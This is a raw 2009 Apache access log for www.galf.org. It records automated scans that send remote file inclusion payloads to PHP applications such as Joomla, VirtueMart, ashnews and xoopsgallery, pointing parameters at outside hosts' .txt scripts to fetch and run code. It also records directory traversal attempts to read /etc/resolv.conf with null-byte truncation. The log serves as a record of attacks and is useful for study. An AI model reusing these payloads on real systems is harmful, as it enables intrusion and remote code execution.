64.62.128.254 - - [28/Dec/2009:01:09:00 -0800] "GET /logs/access_091214.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:09:03 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:09:03 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:09:08 -0800] "GET /logs/access_091214.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:09:08 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:09:08 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:09:10 -0800] "GET /logs/access_091019.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:09:15 -0800] "GET /ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:09:15 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:09:18 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:09:31 -0800] "GET /logs/access_091214.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:09:31 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:09:31 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:09:32 -0800] "GET /ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:09:32 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:09:32 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:09:34 -0800] "GET /logs/access_091019.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:09:35 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:09:35 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:09:35 -0800] "GET /ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.72 - - [28/Dec/2009:01:09:42 -0800] "GET /cendoc/?D=A HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
208.181.243.6 - - [28/Dec/2009:01:10:26 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://pawznclawz.com/administrator/components/com_jreactions/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.181.243.6 - - [28/Dec/2009:01:10:26 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://pawznclawz.com/administrator/components/com_jreactions/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.181.243.6 - - [28/Dec/2009:01:10:28 -0800] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://pawznclawz.com/administrator/components/com_jreactions/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [28/Dec/2009:01:10:32 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:10:32 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:10:32 -0800] "GET /logs/access_091214.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:10:32 -0800] "GET /logs/access_091019.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:10:35 -0800] "GET /logs/access_090921.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:10:58 -0800] "GET /logs/access_091214.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:10:58 -0800] "GET /logs/access_091019.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:10:59 -0800] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:10:59 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:10:59 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:13:07 -0800] "GET /logs/access_091012.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:13:07 -0800] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:13:39 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:13:39 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:13:40 -0800] "GET /logs/access_091214.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:13:42 -0800] "GET /logs/access_091019.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:14:20 -0800] "GET /logs/access_091214.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:14:21 -0800] "GET /logs/access_091019.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:16:04 -0800] "GET /logs/access_091109.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:01:16:57 -0800] "GET /logs/access_091012.log%20%20//?_PHPLIB[libdir]=http://osban.isfreeweb.com/amboard/////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.191.133.141 - - [28/Dec/2009:01:17:37 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.daemyung-eng.co.kr//bbs/files/log/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.191.133.141 - - [28/Dec/2009:01:17:37 -0800] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.daemyung-eng.co.kr//bbs/files/log/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.191.133.141 - - [28/Dec/2009:01:17:38 -0800] "GET /logs/access_091221.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.daemyung-eng.co.kr//bbs/files/log/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:17:51 -0800] "GET /logs/access_091012.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:18:13 -0800] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.191.133.141 - - [28/Dec/2009:01:18:23 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.daemyung-eng.co.kr//bbs/files/log/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.191.133.141 - - [28/Dec/2009:01:18:23 -0800] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.daemyung-eng.co.kr//bbs/files/log/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.191.133.141 - - [28/Dec/2009:01:18:24 -0800] "GET /logs/access.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.daemyung-eng.co.kr//bbs/files/log/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [28/Dec/2009:01:25:07 -0800] "GET /logs/access_091123.log/errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
196.40.83.71 - - [28/Dec/2009:01:25:07 -0800] "GET /errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
196.40.83.71 - - [28/Dec/2009:01:25:07 -0800] "GET /logs/errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
196.40.83.71 - - [28/Dec/2009:01:25:22 -0800] "GET /logs/access_090601.log/errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:01:26:22 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:01:26:28 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:01:26:28 -0800] "GET /logs/access_091019.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:01:26:28 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:01:26:33 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:01:26:33 -0800] "GET /logs/access_091019.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:01:28:02 -0800] "GET /logs/access_090525.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:01:28:03 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:01:28:03 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:01:28:05 -0800] "GET /logs/access_090706.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:01:28:14 -0800] "GET /logs/access_090706.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:01:28:20 -0800] "GET /logs/access_091130.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:01:28:54 -0800] "GET /logs/access_091026.log%20%20//?_PHPLIB[libdir]=http://osban.isfreeweb.com/amboard/////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:01:31:13 -0800] "GET /com_virtuemart/export.php?mosConfig_absolute_path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:01:31:26 -0800] "GET /logs/access_091221.log//com_virtuemart/export.php?mosConfig_absolute_path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:01:31:26 -0800] "GET /logs/access_090622.log//com_virtuemart/export.php?mosConfig_absolute_path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:01:31:37 -0800] "GET /logs/access_090817.log//com_virtuemart/export.php?mosConfig_absolute_path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:01:31:37 -0800] "GET /logs/access_090727.log//com_virtuemart/export.php?mosConfig_absolute_path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:01:31:37 -0800] "GET /logs/access_091012.log//com_virtuemart/export.php?mosConfig_absolute_path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:01:31:57 -0800] "GET /logs/access_091221.log//com_virtuemart/export.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:01:31:57 -0800] "GET /logs//com_virtuemart/export.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:01:31:57 -0800] "GET /com_virtuemart/export.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:32:06 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:32:06 -0800] "GET /logs/access_090720.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:32:06 -0800] "GET /logs/access_091123.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:32:06 -0800] "GET /logs/access_090720.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:32:06 -0800] "GET /logs/access_091123.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:32:06 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:32:07 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:32:07 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:01:32:22 -0800] "GET /logs/access_091012.log/////?_SERVER[DOCUMENT_ROOT]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:01:32:47 -0800] "GET /logs/access_090713.log//com_virtuemart/export.php?mosConfig_absolute_path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:32:53 -0800] "GET /logs/access_091026.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:32:54 -0800] "GET /logs/access_091026.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:33:07 -0800] "GET /logs/access_090713.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:33:08 -0800] "GET /logs/access_090713.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:01:33:23 -0800] "GET /logs/access_090810.log/////?_SERVER[DOCUMENT_ROOT]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:33:25 -0800] "GET /logs/access_090817.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:33:25 -0800] "GET /logs/access_090817.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:33:44 -0800] "GET /logs/access_090706.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:33:44 -0800] "GET /logs/access_090706.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.191.133.141 - - [28/Dec/2009:01:33:52 -0800] "GET /logs/access_091221.log%20%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.daemyung-eng.co.kr//bbs/files/log/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:34:13 -0800] "GET /logs/access_090615.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:34:14 -0800] "GET /logs/access_090615.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:34:16 -0800] "GET /logs/access_090824.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:34:16 -0800] "GET /logs/access_090824.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:01:34:20 -0800] "GET /logs/access_090921.log//com_virtuemart/export.php?mosConfig_absolute_path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:34:42 -0800] "GET /logs/access_090622.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:34:42 -0800] "GET /logs/access_090622.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:01:35:03 -0800] "GET /com_virtuemart/export.php?mosConfig_absolute_path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:35:53 -0800] "GET /logs/access_090817.log%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:35:53 -0800] "GET /logs/access_090817.log%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:35:57 -0800] "GET /logs/access_090824.log%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:01:35:57 -0800] "GET /logs/access_090824.log%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:01:36:50 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
